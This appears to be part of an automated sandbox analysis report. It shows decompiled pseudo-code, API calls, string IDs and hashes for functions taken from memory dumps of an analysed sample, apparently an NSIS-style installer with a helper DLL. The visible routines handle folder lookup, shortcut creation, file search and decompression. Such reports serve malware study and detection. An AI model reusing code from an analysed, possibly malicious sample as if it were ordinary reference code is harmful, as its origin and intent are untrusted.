							E0040592B(_t84, (_t93 << 0xa) + 0x42f000);
						} else {
							E00405889(_t84,  *0x42eb68);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405B89(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42ebe4;
						if( *0x42ebe4 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x42eb64; // 0x73e81340
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x42eb98;
							E00405812(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x42eb98, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E0040594D(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E0040592B(_a4, _t37);
			}































                                      0x0040594d
                                      0x0040594d
                                      0x0040594d
                                      0x00405953
                                      0x00405958
                                      0x0040595a
                                      0x00405969
                                      0x00405969
                                      0x0040596b
                                      0x00405974
                                      0x00405976
                                      0x0040597b
                                      0x0040597e
                                      0x0040597f
                                      0x00405986
                                      0x00405988
                                      0x0040598e
                                      0x00405991
                                      0x00405991
                                      0x00405b66
                                      0x00405b66
                                      0x00405b6a
                                      0x00000000
                                      0x00000000
                                      0x0040599e
                                      0x004059a4
                                      0x00000000
                                      0x00000000
                                      0x004059aa
                                      0x004059ab
                                      0x004059ae
                                      0x004059b1
                                      0x00405b59
                                      0x00405b63
                                      0x00405b65
                                      0x00405b65
                                      0x00405b5b
                                      0x00405b5d
                                      0x00405b5f
                                      0x00405b60
                                      0x00405b60
                                      0x00000000
                                      0x00405b59
                                      0x004059b7
                                      0x004059bb
                                      0x004059c0
                                      0x004059cf
                                      0x004059d2
                                      0x004059d4
                                      0x004059d9
                                      0x004059dc
                                      0x004059df
                                      0x004059e2
                                      0x004059e5
                                      0x004059e8
                                      0x00405b03
                                      0x00405b06
                                      0x00405b36
                                      0x00405b39
                                      0x00405b3e
                                      0x00405b42
                                      0x00405b42
                                      0x00405b47
                                      0x00405b48
                                      0x00405b4d
                                      0x00405b50
                                      0x00405b52
                                      0x00000000
                                      0x00405b52
                                      0x00405b08
                                      0x00405b0b
                                      0x00405b20
                                      0x00405b27
                                      0x00405b0d
                                      0x00405b14
                                      0x00405b14
                                      0x00405b2f
                                      0x00405b32
                                      0x00405afb
                                      0x00405afc
                                      0x00405afc
                                      0x00000000
                                      0x00405b32
                                      0x004059f0
                                      0x004059f1
                                      0x004059f7
                                      0x004059f9
                                      0x00405a13
                                      0x00405a13
                                      0x00405a1a
                                      0x00405a1a
                                      0x00405a21
                                      0x00405a25
                                      0x00405a25
                                      0x00405a26
                                      0x00405a28
                                      0x00405a61
                                      0x00405a64
                                      0x00405a74
                                      0x00405a77
                                      0x00405a7f
                                      0x00405a85
                                      0x00405a85
                                      0x00405ae1
                                      0x00405ae1
                                      0x00405ae3
                                      0x00000000
                                      0x00000000
                                      0x00405a89
                                      0x00405a90
                                      0x00405a91
                                      0x00405a93
                                      0x00405aad
                                      0x00405abb
                                      0x00405ac1
                                      0x00405ac3
                                      0x00405ade
                                      0x00405ade
                                      0x00405ade
                                      0x00000000
                                      0x00405ade
                                      0x00405ac9
                                      0x00405ad4
                                      0x00405ada
                                      0x00405adc
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405adc
                                      0x00405a95
                                      0x00405a98
                                      0x00000000
                                      0x00000000
                                      0x00405aa7
                                      0x00405aa9
                                      0x00405aab
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405aab
                                      0x00000000
                                      0x00405ae1
                                      0x00405a6c
                                      0x00000000
                                      0x00405a2a
                                      0x00405a2f
                                      0x00405a45
                                      0x00405a4a
                                      0x00405a4d
                                      0x00405aea
                                      0x00405aea
                                      0x00405aee
                                      0x00405af6
                                      0x00405af6
                                      0x00000000
                                      0x00405aee
                                      0x00405a57
                                      0x00405ae5
                                      0x00405ae5
                                      0x00405ae8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405ae8
                                      0x00405a28
                                      0x004059fb
                                      0x004059ff
                                      0x00000000
                                      0x00000000
                                      0x00405a01
                                      0x00405a05
                                      0x00000000
                                      0x00000000
                                      0x00405a07
                                      0x00405a0b
                                      0x00000000
                                      0x00405a0d
                                      0x00405a0d
                                      0x00000000
                                      0x00405a0d
                                      0x00405a0b
                                      0x00405b70
                                      0x00405b7a
                                      0x00405b86
                                      0x00405b86
                                      0x00000000

                                      APIs
                                      • GetVersion.KERNEL32(00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 004059F1
                                      • GetSystemDirectoryA.KERNEL32 ref: 00405A6C
                                      • GetWindowsDirectoryA.KERNEL32(hqliygqis,00000400), ref: 00405A7F
                                      • SHGetSpecialFolderLocation.SHELL32(?,0041A90C), ref: 00405ABB
                                      • SHGetPathFromIDListA.SHELL32(0041A90C,hqliygqis), ref: 00405AC9
                                      • CoTaskMemFree.OLE32(0041A90C), ref: 00405AD4
                                      • lstrcatA.KERNEL32(hqliygqis,\Microsoft\Internet Explorer\Quick Launch), ref: 00405AF6
                                      • lstrlenA.KERNEL32(hqliygqis,00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 00405B48
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$hqliygqis$xr
                                      • API String ID: 900638850-1397099916
                                      • Opcode ID: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                      • Instruction ID: df3d1b2a2a9ff386ea366cfb08fccb3f72b75f9b6d2186fcd2ce51f7d99f39fa
                                      • Opcode Fuzzy Hash: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                      • Instruction Fuzzy Hash: 83510071A00A05AADF20AB65DC84BBF3BB4EB55724F14423BE911B62D0D33C6942DF5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10007C40, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 115memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 43%
                                      			E10007C40(void* _a4, long* _a8) {
				signed char _v5;
				void* _v12;
				signed int _v16;
				long _v20;
				long _v24;
				long _v28;
				void* _t49;
				void* _t50;
				void* _t83;

				_v20 = 0;
				_v16 = 0x400;
				 *_a8 = 0;
				if( *_a4 == 2) {
					_v12 = HeapAlloc(GetProcessHeap(), 0, _v16);
					if(_v12 != 0) {
						_v5 =  *((intOrPtr*)(_a4 + 4));
						_v24 = 1;
						while(1) {
							0x10000000(_a4);
							_t83 = _t83 + 4;
							if( *_a4 == 4) {
								break;
							}
							_t49 = _a4;
							if( *_t49 == 2) {
								if(_v24 == 0) {
									_v5 =  *((intOrPtr*)(_a4 + 4));
									L19:
									if(_v24 != 0) {
										_v28 = 0;
									} else {
										_v28 = 1;
									}
									_v24 = _v28;
									continue;
								}
								if(_v20 < _v16) {
									L17:
									0x10000000(_v5 & 0x000000ff);
									_t50 = _a4;
									0x10000000( *(_t50 + 4) & 0x000000ff);
									_t83 = _t83 + 8;
									 *((char*)(_v12 + _v20)) = _t50 + (_t49 << 4);
									_v20 = _v20 + 1;
									goto L19;
								}
								_v16 = _v16 << 1;
								_t49 = HeapReAlloc(GetProcessHeap(), 0, _v12, _v16);
								_v12 = _t49;
								if(_v12 != 0) {
									goto L17;
								}
								return 0;
							}
							if(_v24 != 0) {
								0x10000000("wrong hex string\n");
							}
							 *_a8 = _v12;
							return _v20;
						}
						HeapFree(GetProcessHeap(), 0, _v12);
						return 0;
					}
					return 0;
				}
				0x10000000("Called with incorrect token\n");
				return 0;
			}












                                      0x10007c47
                                      0x10007c4e
                                      0x10007c58
                                      0x10007c64
                                      0x10007c8d
                                      0x10007c94
                                      0x10007ca3
                                      0x10007ca6
                                      0x10007ccb
                                      0x10007ccf
                                      0x10007cd4
                                      0x10007cdd
                                      0x00000000
                                      0x00000000
                                      0x10007cf9
                                      0x10007cff
                                      0x10007d07
                                      0x10007d7a
                                      0x10007d7d
                                      0x10007cb3
                                      0x10007cbe
                                      0x10007cb5
                                      0x10007cb5
                                      0x10007cb5
                                      0x10007cc8
                                      0x00000000
                                      0x10007cc8
                                      0x10007d0f
                                      0x10007d3d
                                      0x10007d42
                                      0x10007d4f
                                      0x10007d57
                                      0x10007d5c
                                      0x10007d67
                                      0x10007d6f
                                      0x00000000
                                      0x10007d6f
                                      0x10007d16
                                      0x10007d2a
                                      0x10007d30
                                      0x10007d37
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x10007d39
                                      0x10007d86
                                      0x10007d8d
                                      0x10007d92
                                      0x10007d9b
                                      0x00000000
                                      0x10007d9d
                                      0x10007cec
                                      0x00000000
                                      0x10007cf2
                                      0x00000000
                                      0x10007c96
                                      0x10007c6b
                                      0x00000000

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 10007C80
                                      • HeapAlloc.KERNEL32(00000000), ref: 10007C87
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID: Called with incorrect token$wrong hex string
                                      • API String ID: 1617791916-2242125364
                                      • Opcode ID: a6a90ffcd8a10080e9a710f7c77a96b48df0c0801f71291b6a37521628043c54
                                      • Instruction ID: f63ccaa0d6a4ec303be1de1ccf0c44d71839b61e384b211fdb8a17e3d3c16ee2
                                      • Opcode Fuzzy Hash: a6a90ffcd8a10080e9a710f7c77a96b48df0c0801f71291b6a37521628043c54
                                      • Instruction Fuzzy Hash: 3B4151B4D04249EFEB01CFA4C885BAEBBB1FF45385F108459F90997245D7359A80CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E0040548B(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409370, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409370, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                      0x0040201b
                                      0x00402025
                                      0x0040202e
                                      0x00402038
                                      0x00402041
                                      0x0040204b
                                      0x0040204f
                                      0x0040204f
                                      0x00402054
                                      0x00402065
                                      0x0040206d
                                      0x0040214d
                                      0x0040214d
                                      0x00402154
                                      0x00402073
                                      0x00402073
                                      0x00402084
                                      0x00402088
                                      0x0040208e
                                      0x00402098
                                      0x0040209a
                                      0x004020a5
                                      0x004020a8
                                      0x004020b5
                                      0x004020b7
                                      0x004020b9
                                      0x004020c0
                                      0x004020c3
                                      0x004020c3
                                      0x004020c6
                                      0x004020d0
                                      0x004020d8
                                      0x004020dd
                                      0x004020e9
                                      0x004020e9
                                      0x004020ec
                                      0x004020f5
                                      0x004020f8
                                      0x00402101
                                      0x00402106
                                      0x00402118
                                      0x00402127
                                      0x00402129
                                      0x00402135
                                      0x00402135
                                      0x00402127
                                      0x00402137
                                      0x0040213d
                                      0x0040213d
                                      0x00402140
                                      0x00402146
                                      0x0040214b
                                      0x00402160
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040214b
                                      0x00402156
                                      0x00402880
                                      0x0040288c

                                      APIs
                                      • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409370,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID: C:\Users\user\AppData\Local\Temp
                                      • API String ID: 123533781-501415292
                                      • Opcode ID: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                      • Instruction ID: 24f6ed1ac1c0c168ca35b22597f39d8cd9e85fbc7861a3d68fdd8e416dd3802a
                                      • Opcode Fuzzy Hash: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                      • Instruction Fuzzy Hash: E2414DB5A00104AFCB00DFA4CD89E9E7BB9EF49354B20416AF505EB2E1DA79ED41CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10013A46, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,00000000,10010D64,-00000328,?,?,?), ref: 10013A4B
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 10013A54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 4b3d0209395e56c5d6677d421284d7fb1a9679e6174efec775dd536027971d7d
                                      • Instruction ID: c225365c7cc3228adce3e5a5af9b1b93b9fbbde98a32bce73f476e71b87c6d18
                                      • Opcode Fuzzy Hash: 4b3d0209395e56c5d6677d421284d7fb1a9679e6174efec775dd536027971d7d
                                      • Instruction Fuzzy Hash: D5B09231044218EBEB022FE1EC49B583FA8EB0E762F008010F60D84060CB72A4908AA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 39%
                                      			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405889(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E0040592B();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                      0x00402648
                                      0x0040265c
                                      0x00402667
                                      0x00402668
                                      0x004027a3
                                      0x0040264a
                                      0x0040264a
                                      0x0040264c
                                      0x0040264e
                                      0x0040264e
                                      0x00402880
                                      0x0040288c

                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID:
                                      • API String ID: 1974802433-0
                                      • Opcode ID: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                      • Instruction ID: 00d369c81b6f5d5ac2b66fc3ece6c10e84ddf32e85f5a3588956fe302b8fe543
                                      • Opcode Fuzzy Hash: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                      • Instruction Fuzzy Hash: 18F0A0726081009EE700EBB59949EFEB768DF21324F6045BBF111B20C1C3B88946DA2A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000EC9C, Relevance: .3, Instructions: 345COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction ID: 69259bdbea72c9186f3c35a85f2e28a7e646cd935bd3354b28d9734df18745cd
                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction Fuzzy Hash: 84C16F322054D309EB4DC639C43413EBAE2EB927F1317476ED4B6DB1DAEF20D9649620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000F0D1, Relevance: .3, Instructions: 341COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction ID: c3a932e525ac3d404fea8d8956a8b4b333aa6e073ad5b9c40615c31299dff31b
                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction Fuzzy Hash: D1C173332055D30AEB5DC639C43403EBAE2AB926F1317576DD8B6DB5D9EF20C924E620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406043, Relevance: .3, Instructions: 334COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E00406043(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004067B2( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x407374; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x407374; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
